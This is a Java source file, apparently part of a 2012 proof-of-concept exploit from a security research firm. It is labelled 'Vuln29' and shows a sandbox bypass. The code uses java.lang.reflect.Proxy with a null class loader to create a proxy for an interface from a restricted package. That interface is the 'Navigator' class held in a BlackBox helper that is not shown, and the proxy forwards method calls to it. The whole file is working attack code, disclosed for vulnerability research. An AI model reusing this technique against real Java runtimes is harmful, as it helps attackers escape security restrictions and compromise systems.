/*## (c) SECURITY EXPLORATIONS    2012 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* java.lang.reflect.Proxy                                                    */
/* creation of Proxy objects for interfaces from restricted packages          */

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */

/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.lang.reflect.*;
import java.io.*;
import java.util.*;

public class Vuln29 {

  public static class MyInvocationHandler implements InvocationHandler {
   public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
    return method.invoke(BlackBox.navigator,args);
   }
  }
  
  public static void get_proxy() {
   try {
     /* create Proxy class for Navigator object                             */
     Class ctab[]=new Class[1];
     ctab[0]=BlackBox.class_navigator;

     Class c=(Class)Proxy.getProxyClass(null,ctab);
     System.out.println("c = "+c);
     BlackBox.class_proxy=c;

     ctab=new Class[1];
     ctab[0]=Class.forName("java.lang.reflect.InvocationHandler");

     Constructor con=c.getConstructor(ctab);

     Object otab[]=new Object[1];
     otab[0]=new MyInvocationHandler();

     Object p=con.newInstance(otab);
     BlackBox.proxy=p;    
   } catch (Throwable e) {
    e.printStackTrace();
   }
  }
}
